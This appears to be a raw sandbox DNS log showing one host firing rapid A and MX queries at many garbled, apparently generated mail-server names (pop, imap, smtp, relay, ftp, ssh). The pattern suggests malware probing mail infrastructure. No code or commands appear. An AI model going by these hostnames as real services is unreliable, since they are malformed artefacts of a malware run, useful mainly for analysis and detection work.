Nov 30, 2023 11:23:23.205168009 CET	192.168.2.4	1.1.1.1	0xc229	Standard query (0)	pop.hmam.comtmail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.207295895 CET	192.168.2.4	1.1.1.1	0x6f47	Standard query (0)	mailgate.6eyaok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.211489916 CET	192.168.2.4	1.1.1.1	0xa2d	Standard query (0)	imap.naburly26a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.214327097 CET	192.168.2.4	1.1.1.1	0x86b6	Standard query (0)	pop.jmramdz9s8l.et	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.223661900 CET	192.168.2.4	1.1.1.1	0xca67	Standard query (0)	pop.ytgaig.tcueain.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.275978088 CET	192.168.2.4	1.1.1.1	0x5177	Standard query (0)	pop.sotuvhlp.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.279947996 CET	192.168.2.4	1.1.1.1	0x9ab0	Standard query (0)	pop3.il.cam	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.281826019 CET	192.168.2.4	1.1.1.1	0x91ec	Standard query (0)	pop3.igaacewo.ukc.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.282521009 CET	192.168.2.4	1.1.1.1	0x3174	Standard query (0)	pop3.hi9tail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.287719011 CET	192.168.2.4	1.1.1.1	0x1092	Standard query (0)	imap.ytgaig.tcueain.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.290894032 CET	192.168.2.4	1.1.1.1	0x9268	Standard query (0)	mailgate.n.zcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.291472912 CET	192.168.2.4	1.1.1.1	0xd2ea	Standard query (0)	imap.hmsn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.391140938 CET	192.168.2.4	1.1.1.1	0x6e5b	Standard query (0)	smtp.igaacewo.ukc.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.399056911 CET	192.168.2.4	1.1.1.1	0x2605	Standard query (0)	mailgate.hyeail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.403405905 CET	192.168.2.4	1.1.1.1	0xc75d	Standard query (0)	imap.yma4j.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.407351017 CET	192.168.2.4	1.1.1.1	0x3e41	Standard query (0)	mailgate.md.coyar.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.484951973 CET	192.168.2.4	1.1.1.1	0x86b6	Standard query (0)	pop.jmramdz9s8l.et	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.489682913 CET	192.168.2.4	1.1.1.1	0xa480	Standard query (0)	imap.otzaail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.490803003 CET	192.168.2.4	1.1.1.1	0xd9c	Standard query (0)	imap.sotuvhlp.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.541856050 CET	192.168.2.4	1.1.1.1	0x5177	Standard query (0)	pop.sotuvhlp.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.541856050 CET	192.168.2.4	1.1.1.1	0x3174	Standard query (0)	pop3.hi9tail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.541884899 CET	192.168.2.4	1.1.1.1	0x91ec	Standard query (0)	pop3.igaacewo.ukc.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.542217970 CET	192.168.2.4	1.1.1.1	0xd2ea	Standard query (0)	imap.hmsn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.549957991 CET	192.168.2.4	1.1.1.1	0x443e	Standard query (0)	imap.aal.netc	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.551857948 CET	192.168.2.4	1.1.1.1	0x4479	Standard query (0)	mailgate.igaacewo.ukc.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.558937073 CET	192.168.2.4	1.1.1.1	0xf353	Standard query (0)	smtp.hyeail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.559040070 CET	192.168.2.4	1.1.1.1	0x5131	Standard query (0)	mailgate.hi9tail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.580454111 CET	192.168.2.4	1.1.1.1	0x7de5	Standard query (0)	pop.otzaail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.580763102 CET	192.168.2.4	1.1.1.1	0xd1ba	Standard query (0)	pop3.yah.o.com.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.585387945 CET	192.168.2.4	1.1.1.1	0x3cee	Standard query (0)	ssh.noweco.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.596503019 CET	192.168.2.4	1.1.1.1	0x259c	Standard query (0)	smtp.md.coyar.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.618908882 CET	192.168.2.4	1.1.1.1	0x9bd0	Standard query (0)	pop3.mmoc.nnlgco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.627571106 CET	192.168.2.4	1.1.1.1	0x36f4	Standard query (0)	mailgate.dtianekicomail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.628854990 CET	192.168.2.4	1.1.1.1	0x7179	Standard query (0)	smtp.n.zcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.631899118 CET	192.168.2.4	1.1.1.1	0x688c	Standard query (0)	mailgate.il.cam	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.632247925 CET	192.168.2.4	1.1.1.1	0x57f3	Standard query (0)	pop3.aal.netc	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.653227091 CET	192.168.2.4	1.1.1.1	0x50ce	Standard query (0)	imap.jmramdz9s8l.et	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.659106970 CET	192.168.2.4	1.1.1.1	0x7c2c	Standard query (0)	pop3.dtianekicomail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.662384987 CET	192.168.2.4	1.1.1.1	0xcc39	Standard query (0)	mailgate.mmoc.nnlgco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.666953087 CET	192.168.2.4	1.1.1.1	0x5641	Standard query (0)	pop3.ytgaig.tcueain.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.691675901 CET	192.168.2.4	1.1.1.1	0xef80	Standard query (0)	relay.hyeail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.694736958 CET	192.168.2.4	1.1.1.1	0xcf16	Standard query (0)	relay.n.zcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.694736958 CET	192.168.2.4	1.1.1.1	0xdd28	Standard query (0)	relay.6eyaok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.694736958 CET	192.168.2.4	1.1.1.1	0x88a	Standard query (0)	pop3.sotuvhlp.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.698033094 CET	192.168.2.4	1.1.1.1	0xfd6a	Standard query (0)	mailgate.naburly26a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.723100901 CET	192.168.2.4	1.1.1.1	0x86d	Standard query (0)	mailgate.yah.o.com.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.723395109 CET	192.168.2.4	1.1.1.1	0x2ce9	Standard query (0)	pop3.hmsn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.723844051 CET	192.168.2.4	1.1.1.1	0x5041	Standard query (0)	mail.a6a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.725097895 CET	192.168.2.4	1.1.1.1	0x8915	Standard query (0)	pop3.naburly26a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.725097895 CET	192.168.2.4	1.1.1.1	0xd26	Standard query (0)	pop3.yma4j.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.725097895 CET	192.168.2.4	1.1.1.1	0x99a6	Standard query (0)	imap.hmam.comtmail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.727032900 CET	192.168.2.4	1.1.1.1	0x4a6	Standard query (0)	pop3.jmramdz9s8l.et	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.729161024 CET	192.168.2.4	1.1.1.1	0x3012	Standard query (0)	smtp.6eyaok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.729161024 CET	192.168.2.4	1.1.1.1	0x84d8	Standard query (0)	mailgate.ytgaig.tcueain.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.734349012 CET	192.168.2.4	1.1.1.1	0x54b6	Standard query (0)	smtp.jmramdz9s8l.et	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.763777971 CET	192.168.2.4	1.1.1.1	0xbdd7	Standard query (0)	mailgate.yma4j.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.763777971 CET	192.168.2.4	1.1.1.1	0xa056	Standard query (0)	relay.md.coyar.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.764262915 CET	192.168.2.4	1.1.1.1	0xb162	Standard query (0)	smtp.yah.o.com.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.765228033 CET	192.168.2.4	1.1.1.1	0x89db	Standard query (0)	smtp.mmoc.nnlgco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.826848030 CET	192.168.2.4	1.1.1.1	0xc7d	Standard query (0)	pop3.hmam.comtmail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.826848030 CET	192.168.2.4	1.1.1.1	0x4479	Standard query (0)	mailgate.igaacewo.ukc.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.827011108 CET	192.168.2.4	1.1.1.1	0x3cee	Standard query (0)	ssh.noweco.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.833264112 CET	192.168.2.4	1.1.1.1	0xeead	Standard query (0)	mailgate.hmsn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.834400892 CET	192.168.2.4	1.1.1.1	0x6e3d	Standard query (0)	smtp.il.cam	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.862344980 CET	192.168.2.4	1.1.1.1	0xa681	Standard query (0)	smtp.hmsn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.869261980 CET	192.168.2.4	1.1.1.1	0x52d9	Standard query (0)	smtp.dtianekicomail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.870495081 CET	192.168.2.4	1.1.1.1	0xb388	Standard query (0)	smtp.naburly26a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.895487070 CET	192.168.2.4	1.1.1.1	0x329d	Standard query (0)	pop3.otzaail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.904817104 CET	192.168.2.4	1.1.1.1	0x50ce	Standard query (0)	imap.jmramdz9s8l.et	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.938258886 CET	192.168.2.4	1.1.1.1	0x25bd	Standard query (0)	e1a73a.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:23.938258886 CET	192.168.2.4	1.1.1.1	0x5d17	Standard query (0)	joaionlnal.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:23.939352036 CET	192.168.2.4	1.1.1.1	0x1ef0	Standard query (0)	relay.hi9tail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.939608097 CET	192.168.2.4	1.1.1.1	0x8be7	Standard query (0)	mailgate.aal.netc	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.940028906 CET	192.168.2.4	1.1.1.1	0x71c9	Standard query (0)	smtp.aal.netc	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.943301916 CET	192.168.2.4	1.1.1.1	0x3123	Standard query (0)	smtp.sotuvhlp.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.943666935 CET	192.168.2.4	1.1.1.1	0x3f04	Standard query (0)	smtp.yma4j.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.968286037 CET	192.168.2.4	1.1.1.1	0x2ce9	Standard query (0)	pop3.hmsn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.968286037 CET	192.168.2.4	1.1.1.1	0x4a6	Standard query (0)	pop3.jmramdz9s8l.et	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.968286037 CET	192.168.2.4	1.1.1.1	0x99a6	Standard query (0)	imap.hmam.comtmail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.972523928 CET	192.168.2.4	1.1.1.1	0xd32e	Standard query (0)	mailgate.otzaail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.972708941 CET	192.168.2.4	1.1.1.1	0xae4e	Standard query (0)	mailgate.sotuvhlp.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.972912073 CET	192.168.2.4	1.1.1.1	0xc3b7	Standard query (0)	smtp.hi9tail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.974128962 CET	192.168.2.4	1.1.1.1	0x331f	Standard query (0)	smtp.hmam.comtmail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.977277994 CET	192.168.2.4	1.1.1.1	0x5c7b	Standard query (0)	e1a73a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.977452993 CET	192.168.2.4	1.1.1.1	0xc7ed	Standard query (0)	joaionlnal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.004848957 CET	192.168.2.4	1.1.1.1	0x720e	Standard query (0)	xezail.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:24.009994984 CET	192.168.2.4	1.1.1.1	0xbceb	Standard query (0)	relay.dtianekicomail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.013257980 CET	192.168.2.4	1.1.1.1	0x2cdb	Standard query (0)	dnasl.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:24.013257980 CET	192.168.2.4	1.1.1.1	0x333e	Standard query (0)	relay.il.cam	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.015769005 CET	192.168.2.4	1.1.1.1	0x54b6	Standard query (0)	smtp.jmramdz9s8l.et	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.015769005 CET	192.168.2.4	1.1.1.1	0xa056	Standard query (0)	relay.md.coyar.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.017579079 CET	192.168.2.4	1.1.1.1	0x9fbb	Standard query (0)	ideo1e.priisav.06eieic.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:24.017750978 CET	192.168.2.4	1.1.1.1	0xcf61	Standard query (0)	ciszxujgaiatail.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:24.018167973 CET	192.168.2.4	1.1.1.1	0xd597	Standard query (0)	eok5ofmail.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:24.046933889 CET	192.168.2.4	1.1.1.1	0x98b9	Standard query (0)	gw.ky	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:24.053914070 CET	192.168.2.4	1.1.1.1	0x771c	Standard query (0)	relay.naburly26a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.093274117 CET	192.168.2.4	1.1.1.1	0xbf56	Standard query (0)	xezail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.093512058 CET	192.168.2.4	1.1.1.1	0xd3e7	Standard query (0)	dnasl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.107198954 CET	192.168.2.4	1.1.1.1	0x7429	Standard query (0)	relay.igaacewo.ukc.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.113260984 CET	192.168.2.4	1.1.1.1	0xcb77	Standard query (0)	relay.mmoc.nnlgco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.116071939 CET	192.168.2.4	1.1.1.1	0xfc80	Standard query (0)	hitamoelka237lil.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:24.116072893 CET	192.168.2.4	1.1.1.1	0x4d99	Standard query (0)	ideo1e.priisav.06eieic.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.116072893 CET	192.168.2.4	1.1.1.1	0x7af2	Standard query (0)	ciszxujgaiatail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.116072893 CET	192.168.2.4	1.1.1.1	0x1aca	Standard query (0)	eok5ofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.120100975 CET	192.168.2.4	1.1.1.1	0xbb77	Standard query (0)	yahim.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:24.120100975 CET	192.168.2.4	1.1.1.1	0xeead	Standard query (0)	mailgate.hmsn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.120101929 CET	192.168.2.4	1.1.1.1	0xb388	Standard query (0)	smtp.naburly26a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.120101929 CET	192.168.2.4	1.1.1.1	0xa681	Standard query (0)	smtp.hmsn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.173260927 CET	192.168.2.4	1.1.1.1	0x7f55	Standard query (0)	gw.ky	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.177293062 CET	192.168.2.4	1.1.1.1	0x329d	Standard query (0)	pop3.otzaail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.202128887 CET	192.168.2.4	1.1.1.1	0x3123	Standard query (0)	smtp.sotuvhlp.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.205285072 CET	192.168.2.4	1.1.1.1	0xd56c	Standard query (0)	relay.yah.o.com.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.205285072 CET	192.168.2.4	1.1.1.1	0x422f	Standard query (0)	smtp.ytgaig.tcueain.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.207890034 CET	192.168.2.4	1.1.1.1	0xf797	Standard query (0)	relay.yma4j.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.253288031 CET	192.168.2.4	1.1.1.1	0xb0c8	Standard query (0)	mailgate.hmam.comtmail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.253643036 CET	192.168.2.4	1.1.1.1	0xfa12	Standard query (0)	hitamoelka237lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.253779888 CET	192.168.2.4	1.1.1.1	0xbceb	Standard query (0)	relay.dtianekicomail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.254741907 CET	192.168.2.4	1.1.1.1	0xed70	Standard query (0)	yahim.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.256901979 CET	192.168.2.4	1.1.1.1	0x601b	Standard query (0)	imap.a6a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.272023916 CET	192.168.2.4	1.1.1.1	0x7451	Standard query (0)	relay.ytgaig.tcueain.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.310508966 CET	192.168.2.4	1.1.1.1	0x2cdb	Standard query (0)	dnasl.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:24.310508966 CET	192.168.2.4	1.1.1.1	0x771c	Standard query (0)	relay.naburly26a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.310508966 CET	192.168.2.4	1.1.1.1	0x98b9	Standard query (0)	gw.ky	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:24.315366030 CET	192.168.2.4	1.1.1.1	0x3844	Standard query (0)	mailgate.jmramdz9s8l.et	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.335407019 CET	192.168.2.4	1.1.1.1	0x42b	Standard query (0)	smtp.otzaail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.351027012 CET	192.168.2.4	1.1.1.1	0x637a	Standard query (0)	relay.aal.netc	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.363233089 CET	192.168.2.4	1.1.1.1	0xd3e7	Standard query (0)	dnasl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.370368004 CET	192.168.2.4	1.1.1.1	0x5795	Standard query (0)	ftp.e1a73a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.374331951 CET	192.168.2.4	1.1.1.1	0x7af2	Standard query (0)	ciszxujgaiatail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.374428034 CET	192.168.2.4	1.1.1.1	0xb5f9	Standard query (0)	ftp.joaionlnal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.374428034 CET	192.168.2.4	1.1.1.1	0x7429	Standard query (0)	relay.igaacewo.ukc.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.424300909 CET	192.168.2.4	1.1.1.1	0xc7af	Standard query (0)	relay.sotuvhlp.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.435260057 CET	192.168.2.4	1.1.1.1	0xa992	Standard query (0)	mail.e1a73a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.455138922 CET	192.168.2.4	1.1.1.1	0xed6d	Standard query (0)	ftp.ideo1e.priisav.06eieic.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.477411032 CET	192.168.2.4	1.1.1.1	0xae36	Standard query (0)	ssh.e1a73a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.477696896 CET	192.168.2.4	1.1.1.1	0x7095	Standard query (0)	ssh.joaionlnal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.489258051 CET	192.168.2.4	1.1.1.1	0x93fa	Standard query (0)	relay.hmsn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.491442919 CET	192.168.2.4	1.1.1.1	0x851c	Standard query (0)	ftp.xezail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.525624037 CET	192.168.2.4	1.1.1.1	0xe7c3	Standard query (0)	mail.ideo1e.priisav.06eieic.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.542129993 CET	192.168.2.4	1.1.1.1	0xc184	Standard query (0)	mail.eok5ofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.542396069 CET	192.168.2.4	1.1.1.1	0x2f59	Standard query (0)	mail.joaionlnal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.544096947 CET	192.168.2.4	1.1.1.1	0x4eb6	Standard query (0)	mail.xezail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.551219940 CET	192.168.2.4	1.1.1.1	0x299c	Standard query (0)	ftp.eok5ofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.559690952 CET	192.168.2.4	1.1.1.1	0x3844	Standard query (0)	mailgate.jmramdz9s8l.et	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.598022938 CET	192.168.2.4	1.1.1.1	0xc771	Standard query (0)	ssh.ideo1e.priisav.06eieic.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.624185085 CET	192.168.2.4	1.1.1.1	0x1f05	Standard query (0)	ssh.xezail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.625430107 CET	192.168.2.4	1.1.1.1	0x2f2e	Standard query (0)	relay.otzaail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.648387909 CET	192.168.2.4	1.1.1.1	0x46ee	Standard query (0)	relay.hmam.comtmail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.717334032 CET	192.168.2.4	1.1.1.1	0xed6d	Standard query (0)	ftp.ideo1e.priisav.06eieic.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.731146097 CET	192.168.2.4	1.1.1.1	0xbe6	Standard query (0)	ftp.gw.ky	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.775039911 CET	192.168.2.4	1.1.1.1	0x2ae9	Standard query (0)	mail.gw.ky	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.775136948 CET	192.168.2.4	1.1.1.1	0x93fa	Standard query (0)	relay.hmsn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.794946909 CET	192.168.2.4	1.1.1.1	0xc184	Standard query (0)	mail.eok5ofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.795171976 CET	192.168.2.4	1.1.1.1	0x9ed5	Standard query (0)	ssh.gw.ky	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.819474936 CET	192.168.2.4	1.1.1.1	0xe825	Standard query (0)	ftp.ciszxujgaiatail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.873132944 CET	192.168.2.4	1.1.1.1	0xa88e	Standard query (0)	mail.gmaso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.873518944 CET	192.168.2.4	1.1.1.1	0x873f	Standard query (0)	ssh.eok5ofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.874959946 CET	192.168.2.4	1.1.1.1	0xf890	Standard query (0)	mail.hitamoelka237lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.877826929 CET	192.168.2.4	1.1.1.1	0x5d96	Standard query (0)	mailgate.a6a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.048326969 CET	192.168.2.4	1.1.1.1	0xaf97	Standard query (0)	relay.jmramdz9s8l.et	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.057435989 CET	192.168.2.4	1.1.1.1	0xa1ce	Standard query (0)	ssh.ciszxujgaiatail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.071500063 CET	192.168.2.4	1.1.1.1	0x4fc9	Standard query (0)	liks.cohlm	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:25.166618109 CET	192.168.2.4	1.1.1.1	0x80b8	Standard query (0)	mail.ciszxujgaiatail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.169503927 CET	192.168.2.4	1.1.1.1	0x8210	Standard query (0)	ftp.hitamoelka237lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.178020954 CET	192.168.2.4	1.1.1.1	0x40ce	Standard query (0)	pop.ideo1e.priisav.06eieic.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.178301096 CET	192.168.2.4	1.1.1.1	0x852d	Standard query (0)	pop.xezail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.276819944 CET	192.168.2.4	1.1.1.1	0x4424	Standard query (0)	www.dnasl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.278913021 CET	192.168.2.4	1.1.1.1	0x1c0e	Standard query (0)	imap.e1a73a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.304204941 CET	192.168.2.4	1.1.1.1	0xaf97	Standard query (0)	relay.jmramdz9s8l.et	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.308971882 CET	192.168.2.4	1.1.1.1	0x7953	Standard query (0)	liks.cohlm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.437536001 CET	192.168.2.4	1.1.1.1	0x80b8	Standard query (0)	mail.ciszxujgaiatail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.438524008 CET	192.168.2.4	1.1.1.1	0xda83	Standard query (0)	sdas.d20ail.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:25.438815117 CET	192.168.2.4	1.1.1.1	0xee	Standard query (0)	gadtolsr2l1l.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:25.495476961 CET	192.168.2.4	1.1.1.1	0xb254	Standard query (0)	pop.e1a73a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.498100996 CET	192.168.2.4	1.1.1.1	0x7753	Standard query (0)	c.mail.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:25.498100996 CET	192.168.2.4	1.1.1.1	0xa9dc	Standard query (0)	ht.am.cz	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:25.498214960 CET	192.168.2.4	1.1.1.1	0x39c4	Standard query (0)	s93ail.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:25.498945951 CET	192.168.2.4	1.1.1.1	0xdd44	Standard query (0)	imap.xezail.com	A (IP address)	IN (0x0001)	false
